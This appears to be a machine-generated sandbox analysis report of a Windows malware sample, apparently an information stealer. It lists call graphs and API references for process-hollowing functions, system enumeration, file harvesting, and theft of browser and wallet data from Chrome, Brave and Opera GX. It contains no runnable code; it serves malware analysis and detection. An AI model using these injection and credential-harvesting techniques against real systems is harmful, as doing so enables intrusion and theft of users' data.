GetLocaleInfoA 76371->76377 76372 410eda 76374 41d05a __setlocale_nolock 5 API calls 76372->76374 76373 410ece LocalFree 76373->76372 76375 410eea 76374->76375 76375->75611 76376 4105de lstrlenA lstrcpyA lstrcatA 76376->76377 76377->76371 76377->76376 76378 410562 lstrcpyA 76377->76378 76377->76379 76378->76377 76379->76372 76379->76373 76381 410d5b 76380->76381 76382 410d3f wsprintfA 76380->76382 76383 41d05a __setlocale_nolock 5 API calls 76381->76383 76382->76381 76384 410d68 76383->76384 76384->75639 76386 410f81 RegCloseKey 76385->76386 76387 410f69 RegQueryValueExA 76385->76387 76386->75656 76387->76386 76389 411051 GetLogicalProcessorInformationEx 76388->76389 76390 41101d GetLastError 76389->76390 76392 41105c 76389->76392 76391 41102c 76390->76391 76395 4110c8 76390->76395 76401 411030 76391->76401 76493 411b30 GetProcessHeap HeapFree 76392->76493 76394 4110d2 76402 41d05a __setlocale_nolock 5 API calls 76394->76402 76395->76394 76494 411b30 GetProcessHeap HeapFree 76395->76494 76396 411095 76396->76394 76400 41109e wsprintfA 76396->76400 76400->76394 76401->76389 76403 4110c1 76401->76403 76491 411b30 GetProcessHeap HeapFree 76401->76491 76492 411b4d GetProcessHeap HeapAlloc 76401->76492 76404 4110ec 76402->76404 76403->76394 76404->75671 76406 41d05a __setlocale_nolock 5 API calls 76405->76406 76407 410fda 76406->76407 76407->75685 76495 411afb 76408->76495 76411 411134 wsprintfA 76413 41d05a __setlocale_nolock 5 API calls 76411->76413 76414 411165 76413->76414 76414->75699 76416 4104bc lstrcpyA 76415->76416 76422 411188 76416->76422 76417 4111b4 EnumDisplayDevicesA 76418 4111c8 76417->76418 76417->76422 76419 41d05a __setlocale_nolock 5 API calls 76418->76419 76421 4111d6 76419->76421 76420 41051e 2 API calls 76420->76422 76421->75713 76422->76417 76422->76418 76422->76420 76424 4104bc lstrcpyA 76423->76424 76425 41149b CreateToolhelp32Snapshot Process32First 76424->76425 76426 411521 CloseHandle 76425->76426 76432 4114c3 76425->76432 76427 41d05a __setlocale_nolock 5 API calls 76426->76427 76429 411536 76427->76429 76428 41150f Process32Next 76428->76426 76428->76432 76429->75727 76430 4105de lstrlenA lstrcpyA lstrcatA 76430->76432 76431 410562 lstrcpyA 76431->76432 76432->76428 76432->76430 76432->76431 76434 4104bc lstrcpyA 76433->76434 76435 411210 RegOpenKeyExA 76434->76435 76436 41144d 76435->76436 76452 411256 76435->76452 76438 4104ee lstrcpyA 76436->76438 76437 41125c RegEnumKeyExA 76439 411299 wsprintfA RegOpenKeyExA 76437->76439 76437->76452 76440 41145e 76438->76440 76442 411435 RegCloseKey 76439->76442 76443 4112df RegQueryValueExA 76439->76443 76447 41d05a __setlocale_nolock 5 API calls 76440->76447 76441 411433 76444 411441 RegCloseKey 76441->76444 76442->76444 76445 411415 RegCloseKey 76443->76445 76446 411315 lstrlenA 76443->76446 76444->76436 76445->76452 76446->76445 76446->76452 76448 411478 76447->76448 76448->75741 76449 410562 lstrcpyA 76449->76452 76450 411385 RegQueryValueExA 76450->76445 76450->76452 76451 4105de lstrlenA lstrcpyA lstrcatA 76451->76452 76452->76437 76452->76441 76452->76445 76452->76449 76452->76450 76452->76451 76454 416ee9 76453->76454 76455 410562 lstrcpyA 76454->76455 76456 416f06 76455->76456 76457 410562 lstrcpyA 76456->76457 76458 416f22 76457->76458 76459 410562 lstrcpyA 76458->76459 76460 416f2d 76459->76460 76461 410562 lstrcpyA 76460->76461 76462 416f38 76461->76462 76463 416f3f Sleep 76462->76463 76464 416f4f 76462->76464 76463->76462 76465 416f6b CreateThread WaitForSingleObject 76464->76465 76497 41cd0d 76464->76497 76467 4104bc lstrcpyA 76465->76467 76688 416e08 76465->76688 76469 416f93 76467->76469 76469->75760 76471 4115e1 RegOpenKeyExA 76470->76471 76471->76314 76471->76315 76475 410b7e GetProcessHeap HeapAlloc RegOpenKeyExA 76472->76475 76474 410b2d 76474->76328 76474->76329 76476 410bc1 RegQueryValueExA 76475->76476 76477 410bd8 RegCloseKey 76475->76477 76476->76477 76478 410be8 76477->76478 76478->76474 76479->76334 76488 42f0ed 76480->76488 76482 411738 CoCreateInstance 76483 411760 SysAllocString 76482->76483 76484 4117bc 76482->76484 76483->76484 76486 41176f 76483->76486 76484->76346 76485 4117b5 SysFreeString 76485->76484 76486->76485 76487 411793 _wtoi64 SysFreeString 76486->76487 76487->76485 76488->76482 76489->76351 76490->76361 76491->76401 76492->76401 76493->76396 76494->76394 76496 411122 GlobalMemoryStatusEx 76495->76496 76496->76411 76500 41ccc5 76497->76500 76501 41ccd4 76500->76501 76502 416f69 76500->76502 76501->76502 76504 41c4b7 76501->76504 76502->76465 76508 41c4e9 76504->76508 76567 41c4df 76504->76567 76505 41c513 lstrcpyA 76509 41c530 76505->76509 76505->76567 76506 41d05a __setlocale_nolock 5 API calls 76507 41caf0 76506->76507 76507->76502 76508->76505 76508->76567 76510 41c5a0 76509->76510 76644 41b8b5 9 API calls 76509->76644 76512 41c5c1 76510->76512 76513 41c5b2 76510->76513 76515 41c5d6 76512->76515 76516 41c5c6 76512->76516 76645 41bf8c 20 API calls 76513->76645 76519 41c5eb 76515->76519 76520 41c5db 76515->76520 76646 41c00b 18 API calls __setlocale_nolock 76516->76646 76517 41c5bf 76522 41c5f9 76517->76522 76521 41c5f4 76519->76521 76519->76567 76647 41c12e 8 API calls __setlocale_nolock 76520->76647 76648 41c1f1 8 API calls __setlocale_nolock 76521->76648 76525 41c603 lstrcpyA lstrcpyA lstrlenA 76522->76525 76522->76567 76526 41c643 lstrcatA 76525->76526 76527 41c65b lstrcpyA 76525->76527 76526->76527 76528 41c6c4 76527->76528 76568 41ae98 76528->76568 76567->76506 76654 41bdc5 malloc WriteFile _memmove 76568->76654 76570 41aeb0 76655 41bdc5 malloc WriteFile _memmove 76570->76655 76572 41aec0 76656 41bdc5 malloc WriteFile _memmove 76572->76656 76574 41aed0 76657 41bdc5 malloc WriteFile _memmove 76574->76657 76576 41aee0 76658 41bdc5 malloc WriteFile _memmove 76576->76658 76578 41aef2 76659 41bdc5 malloc WriteFile _memmove 76578->76659 76580 41af04 76660 41bdc5 malloc WriteFile _memmove 76580->76660 76582 41af16 76644->76510 76645->76517 76646->76517 76647->76517 76648->76522 76654->76570 76655->76572 76656->76574 76657->76576 76658->76578 76659->76580 76660->76582 76697 42f0ed 76688->76697 76690 416e14 lstrlenA 76694 416e30 76690->76694 76696 416e25 76690->76696 76691 4104ee lstrcpyA 76691->76694 76692 405482 45 API calls 76692->76694 76693 410562 lstrcpyA 76693->76694 76694->76691 76694->76692 76694->76693 76695 416e96 StrCmpCA 76694->76695 76695->76694 76695->76696 76697->76690 77032 407eae malloc 76698->77032 76700 407efc 76700->75796 77035 407d13 77032->77035 77038 407bd2 77035->77038 77037 407d2d 77037->76700 77039 407be4 77038->77039 77040 407be9 77038->77040 77039->77037 77055 40773f 77040->77055 77043 407cd4 77043->77037 77057 407750 77055->77057 77056 407757 77056->77043 77061 4077f8 77056->77061 77057->77056 77058 4077a9 77057->77058 78166 4184cf 78167 4184d6 78166->78167 78168 41d05a __setlocale_nolock 5 API calls 78167->78168 78169 4184eb 78168->78169 78170 4052ff 78171 405305 HttpOpenRequestA 78170->78171 78172 40543f InternetCloseHandle 78170->78172 78174 405433 InternetCloseHandle 78171->78174 78175 405346 78171->78175 78173 40544b InternetCloseHandle 78172->78173 78178 40539e 78173->78178 78174->78172 78176 405366 HttpSendRequestA HttpQueryInfoA 78175->78176 78177 40534a InternetSetOptionA 78175->78177 78176->78178 78179 4053bb 78176->78179 78177->78176 78181 41d05a __setlocale_nolock 5 API calls 78178->78181 78179->78174 78180 4053c1 InternetReadFile 78179->78180 78180->78174 78180->78179 78182 405480 78181->78182

                                                                                                                                                                                                                            Executed Functions

                                                                                                                                                                                                                            Function 00418995 Relevance: 231.5, APIs: 121, Strings: 11, Instructions: 518libraryloaderCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                            • String ID: CreateProcessA$GetThreadContext$HttpQueryInfoA$InternetSetOptionA$ReadProcessMemory$ResumeThread$SetThreadContext$SymMatchString$VirtualAllocEx$WriteProcessMemory$dbghelp.dll
                                                                                                                                                                                                                            • API String ID: 2238633743-2740034357
                                                                                                                                                                                                                            • Opcode ID: bc716f2625a0e41b2ed4bb766179c27d34b4bc4e0803ef392b74f70fe9059fed
                                                                                                                                                                                                                            • Instruction ID: 21a79a8d855260e2828667f180bc927f9092200f68422498ddf411ab147124d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bc716f2625a0e41b2ed4bb766179c27d34b4bc4e0803ef392b74f70fe9059fed
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C852F975911312AFDF1ADFA0FD0A8243AABFB08203F11B565E91982274D7774B60EF15
                                                                                                                                                                                                                            Function 00414D08 Relevance: 49.3, APIs: 24, Strings: 4, Instructions: 297filestringCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 1325 414d08-414daf call 42e3e0 wsprintfA FindFirstFileA call 423c60 * 2 1332 414db5-414dc9 StrCmpCA 1325->1332 1333 41516b-415181 call 401cde call 41d05a 1325->1333 1335 415138-41514d FindNextFileA 1332->1335 1336 414dcf-414de3 StrCmpCA 1332->1336 1338 41515f-415165 FindClose 1335->1338 1339 41514f-415151 1335->1339 1336->1335 1340 414de9-414e2b wsprintfA StrCmpCA 1336->1340 1338->1333 1339->1332 1342 414e4a-414e5c wsprintfA 1340->1342 1343 414e2d-414e48 wsprintfA 1340->1343 1344 414e5f-414e9c call 423c60 lstrcatA 1342->1344 1343->1344 1348 414ec2-414ec9 strtok_s 1344->1348 1349 414ecb-414f09 call 423c60 lstrcatA strtok_s 1348->1349 1350 414e9e-414eaf 1348->1350 1355 4150c9-4150cd 1349->1355 1356 414f0f-414f1f PathMatchSpecA 1349->1356 1354 414eb5-414ec1 1350->1354 1350->1355 1354->1348 1355->1335 1357 4150cf-4150d5 1355->1357 1358 414f25-414ffe call 4104bc call 411c1f call 4105de call 41059c call 4105de call 41059c call 410562 call 402920 * 5 DeleteFileA CopyFileA call 41213b call 42f010 1356->1358 1359 415019-41502e strtok_s 1356->1359 1357->1338 1360 4150db-4150e9 1357->1360 1395 415000-415014 DeleteFileA call 402920 1358->1395 1396 415039-415045 1358->1396 1359->1356 1362 415034 1359->1362 1360->1335 1363 4150eb-41512d call 401cfd call 414d08 1360->1363 1362->1355 1372 415132 1363->1372 1372->1335 1395->1359 1397 415156-41515d call 402920 1396->1397 1398 41504b-415071 call 4104ee call 407fac 1396->1398 1397->1333 1407 415073-4150b7 call 401cfd call 4104bc call 416ed9 call 402920 1398->1407 1408 4150bd-4150c4 call 402920 1398->1408 1407->1408 1408->1355
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00414D5C
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?), ref: 00414D73
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00414D8F
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00414DA0
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A00), ref: 00414DC1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00436A04), ref: 00414DDB
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00414E02
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,0043660F), ref: 00414E16
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00414E3F
                                                                                                                                                                                                                            • wsprintfA.USER32 ref: 00414E56
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00414E68
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00414E7D
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00414EC2
                                                                                                                                                                                                                            • _memset.LIBCMT ref: 00414ED4
                                                                                                                                                                                                                            • lstrcatA.KERNEL32(?,?), ref: 00414EE9
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00414F02
                                                                                                                                                                                                                            • PathMatchSpecA.SHLWAPI(?,00000000), ref: 00414F17
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,00436A30,0043661D), ref: 00414FD0
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 00414FE0
                                                                                                                                                                                                                              • Part of subcall function 0041213B: CreateFileA.KERNEL32(OA,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,00414FEC,?), ref: 00412156
                                                                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00414FF6
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?,00000000,?,000003E8,00000000), ref: 00415001
                                                                                                                                                                                                                            • strtok_s.MSVCRT ref: 00415027
                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00415145
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 00415165
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$_memsetlstrcatwsprintf$Findlstrcpystrtok_s$Delete$CloseCopyCreateFirstMatchNextPathSpecUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                                                                                                                                                                                                            • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                            • API String ID: 956187361-332874205
                                                                                                                                                                                                                            • Opcode ID: 3e61bb49e99222b85e6a566a6016102fce6695bd526a2befcf9641335af51fec
                                                                                                                                                                                                                            • Instruction ID: ac959522ac8161a8c59de6a03dc3e9916ed04c50c613448a2b432023ce8b070b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e61bb49e99222b85e6a566a6016102fce6695bd526a2befcf9641335af51fec
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D6C13BB1D0021AABCF22EF60DC45AEE777DAB48304F0140A6FA09B3151DB799B858F59
                                                                                                                                                                                                                            Function 00409CF1 Relevance: 44.4, APIs: 20, Strings: 5, Instructions: 610fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                            control_flow_graph 1437 409cf1-409daa call 4104bc call 41059c call 4105de call 410562 call 402920 * 2 call 4104bc * 2 FindFirstFileA 1454 409db0-409dc4 StrCmpCA 1437->1454 1455 40a75d-40a7ac call 402920 * 3 call 401cde call 402920 * 3 call 41d05a 1437->1455 1457 40a736-40a74b FindNextFileA 1454->1457 1458 409dca-409dde StrCmpCA 1454->1458 1457->1454 1459 40a751-40a757 FindClose 1457->1459 1458->1457 1460 409de4-409e5a call 41051e call 41059c call 4105de * 2 call 410562 call 402920 * 3 1458->1460 1459->1455 1492 409e60-409e76 StrCmpCA 1460->1492 1493 409f63-409fd7 call 4105de * 4 call 410562 call 402920 * 3 1460->1493 1494 409e78-409ee8 call 4105de * 4 call 410562 call 402920 * 3 1492->1494 1495 409eed-409f61 call 4105de * 4 call 410562 call 402920 * 3 1492->1495 1544 409fdd-409ff2 call 402920 StrCmpCA 1493->1544 1494->1544 1495->1544 1547 40a1c4-40a1d9 StrCmpCA 1544->1547 1548 409ff8-40a00c StrCmpCA 1544->1548 1549 40a1db-40a21e call 401cfd call 4104ee * 3 call 408533 1547->1549 1550 40a22e-40a243 StrCmpCA 1547->1550 1548->1547 1551 40a012-40a148 call 4104bc call 411c1f call 4105de call 41059c call 4105de call 41059c call 410562 call 402920 * 5 CopyFileA call 4104bc call 4105de * 2 call 410562 call 402920 * 2 call 4104ee call 407fac 1548->1551 1609 40a223-40a229 1549->1609 1552 40a2a4-40a2be call 4104ee call 411d67 1550->1552 1553 40a245-40a256 StrCmpCA 1550->1553 1734 40a14a-40a188 call 401cfd call 4104ee call 416ed9 call 402920 1551->1734 1735 40a18d-40a1bf DeleteFileA call 402920 * 3 1551->1735 1579 40a2c0-40a2c4 1552->1579 1580 40a324-40a339 StrCmpCA 1552->1580 1557 40a6a5-40a6ac 1553->1557 1558 40a25c-40a260 1553->1558 1562 40a706-40a730 call 402920 * 2 1557->1562 1563 40a6ae-40a6fb call 401cfd call 4104ee * 2 call 4104bc call 409cf1 1557->1563 1558->1557 1564 40a266-40a2a2 call 401cfd call 4104ee * 2 1558->1564 1562->1457 1632 40a700 1563->1632 1613 40a30a-40a314 call 4104ee call 408853 1564->1613 1579->1557 1586 40a2ca-40a304 call 401cfd call 4104ee call 4104bc 1579->1586 1592 40a51b-40a530 StrCmpCA 1580->1592 1593 40a33f-40a3fb call 4104bc call 411c1f call 4105de call 41059c call 4105de call 41059c call 410562 call 402920 * 5 CopyFileA 1580->1593 1586->1613 1592->1557 1598 40a536-40a5f2 call 4104bc call 411c1f call 4105de call 41059c call 4105de call 41059c call 410562 call 402920 * 5 CopyFileA 1592->1598 1689 40a401-40a488 call 401cfd call 4104ee * 3 call 408dac call 401cfd call 4104ee * 3 call 40951a 1593->1689 1690 40a48e-40a49e StrCmpCA 1593->1690 1692 40a5f8-40a632 call 401cfd call 4104ee * 3 call 409043 1598->1692 1693 40a679-40a68b DeleteFileA call 402920 1598->1693 1609->1557 1636 40a319-40a31f 1613->1636 1632->1562 1636->1557 1689->1690 1695 40a4a0-40a4eb call 401cfd call 4104ee * 3 call 4099e1 1690->1695 1696 40a4f1-40a503 DeleteFileA call 402920 1690->1696 1746 40a637-40a673 call 401cfd call 4104ee * 3 call 409278 1692->1746 1708 40a690-40a697 1693->1708 1695->1696 1707 40a508-40a516 1696->1707 1714 40a69e-40a6a0 call 402920 1707->1714 1708->1714 1714->1557 1734->1735 1735->1547 1746->1693
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                              • Part of subcall function 004104BC: lstrcpyA.KERNEL32(00000000,00000000,?,004170BD,004366BA,?,?,?,?,004185D1), ref: 004104E2
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0041762B,004366D6), ref: 004105CA
                                                                                                                                                                                                                              • Part of subcall function 0041059C: lstrcatA.KERNEL32(?,?), ref: 004105D4
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 004105F2
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 0041061A
                                                                                                                                                                                                                              • Part of subcall function 004105DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004170DE,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410625
                                                                                                                                                                                                                              • Part of subcall function 00410562: lstrcpyA.KERNEL32(00000000,?,00000000,004170FC,00436C20,00000000,004366BA,?,?,?,?,004185D1), ref: 00410592
                                                                                                                                                                                                                            • FindFirstFileA.KERNEL32(?,?,004367F2,004367EF,0043731C,004367EE,?,?,?), ref: 00409D9B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437320), ref: 00409DBC
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,00437324), ref: 00409DD6
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrlenA.KERNEL32(?,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410524
                                                                                                                                                                                                                              • Part of subcall function 0041051E: lstrcpyA.KERNEL32(00000000,00000000,?,004171B6,004366BE,004366BB,?,?,?,?,004185D1), ref: 00410556
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Opera GX,00437328,?,004367F3), ref: 00409E68
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Brave,00437348,0043734C,00437328,?,004367F3), ref: 00409FEA
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Preferences), ref: 0040A004
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A0C4
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A193
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A1D1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A23B
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(0040CCBE), ref: 0040A24E
                                                                                                                                                                                                                              • Part of subcall function 004104EE: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417663), ref: 0041050D
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A331
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A3F1
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?,Google Chrome), ref: 0040A496
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A4F7
                                                                                                                                                                                                                              • Part of subcall function 00408DAC: lstrlenA.KERNEL32(?), ref: 00408FA5
                                                                                                                                                                                                                              • Part of subcall function 00408DAC: lstrlenA.KERNEL32(?), ref: 00408FC0
                                                                                                                                                                                                                              • Part of subcall function 0040951A: lstrlenA.KERNEL32(?), ref: 00409943
                                                                                                                                                                                                                              • Part of subcall function 0040951A: lstrlenA.KERNEL32(?), ref: 0040995E
                                                                                                                                                                                                                            • StrCmpCA.SHLWAPI(?), ref: 0040A528
                                                                                                                                                                                                                            • CopyFileA.KERNEL32(?,?,00000001), ref: 0040A5E8
                                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 0040A67F
                                                                                                                                                                                                                              • Part of subcall function 00411C1F: GetSystemTime.KERNEL32(?,004366E2,?), ref: 00411C4E
                                                                                                                                                                                                                            • FindNextFileA.KERNEL32(?,?), ref: 0040A743
                                                                                                                                                                                                                            • FindClose.KERNEL32(?), ref: 0040A757
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2685053359.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_400000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: File$lstrcpylstrlen$CopyDeleteFind$lstrcat$CloseFirstNextSystemTime
                                                                                                                                                                                                                            • String ID: Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                            • API String ID: 4173076446-1189830961
                                                                                                                                                                                                                            • Opcode ID: 8fc049c6064f073d3ec65615c8ca8381da3a844228e7ecfc0e362c3e7e949e19
                                                                                                                                                                                                                            • Instruction ID: 48880eb817f0d2ddf9522f76590e66a3f39f609c672a9a9f4bfe22da231884da
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fc049c6064f073d3ec65615c8ca8381da3a844228e7ecfc0e362c3e7e949e19
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 90421E319002299BCF21FB25DD46BCD7775AF04308F4101AAB948B31A1DBB99ED99F89
                                                                                                                                                                                                                            Function 00416013 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 205stringfileCOMMON
                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2685053359.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
